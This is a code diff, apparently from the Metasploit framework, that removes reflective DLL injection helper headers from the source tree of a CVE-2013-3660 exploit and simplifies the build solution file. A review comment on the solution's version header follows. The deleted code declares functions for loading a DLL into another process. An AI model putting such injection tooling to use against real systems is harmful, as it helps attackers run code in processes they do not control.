- } while( 0 );
-
- }
- __except( EXCEPTION_EXECUTE_HANDLER )
- {
- hThread = NULL;
- }
-
- return hThread;
-}
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
deleted file mode 100755
index d8419858a9..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
+++ /dev/null
@@ -1,41 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-#define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
-//===============================================================================================//
-#include "ReflectiveDLLInjection.h"
-
-DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
-
-HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
-
-HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
deleted file mode 100755
index 27db65dc1b..0000000000
--- a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
+++ /dev/null
@@ -1,51 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
-//===============================================================================================//
-#include
-// we declare some common stuff in here...
-
-#define DLL_METASPLOIT_ATTACH 4
-#define DLL_METASPLOIT_DETACH 5
-#define DLL_QUERY_HMODULE 6
-
-#define DEREF( name )*(UINT_PTR *)(name)
-#define DEREF_64( name )*(DWORD64 *)(name)
-#define DEREF_32( name )*(DWORD *)(name)
-#define DEREF_16( name )*(WORD *)(name)
-#define DEREF_8( name )*(BYTE *)(name)
-
-typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
-typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
-
-#define DLLEXPORT __declspec( dllexport )
-
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
index ee7fc4ace6..0a0dde7c06 100755
--- a/external/source/exploits/cve-2013-3660/rdi.sln
+++ b/external/source/exploits/cve-2013-3660/rdi.sln
@@ -1,44 +1,18 @@
Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Express 2012 for Windows Desktop
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
-EndProject
+# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|ARM = Debug|ARM
Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
- Release|ARM = Release|ARM
Release|Win32 = Release|Win32
- Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64
- {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
- {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
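Review bot: The solution header now disagrees with itself: the added comment `# Visual C++ Express 2010` sits directly under the unchanged `Microsoft Visual Studio Solution File, Format Version 12.00`. Visual Studio 2010 writes format version 11.00, and 12.00 is what the 2012 and later releases emit. The Visual Studio version selector uses that comment line to decide which IDE opens the file, so someone rebuilding the DLL to verify it cannot tell from this file which toolchain is intended. Either keep the previous `# Visual Studio Express 2012 for Windows Desktop` line or change the first line to `Format Version 11.00`, whichever matches the platform toolset in `dll\reflective_dll.vcxproj`, which is not visible in this hunk.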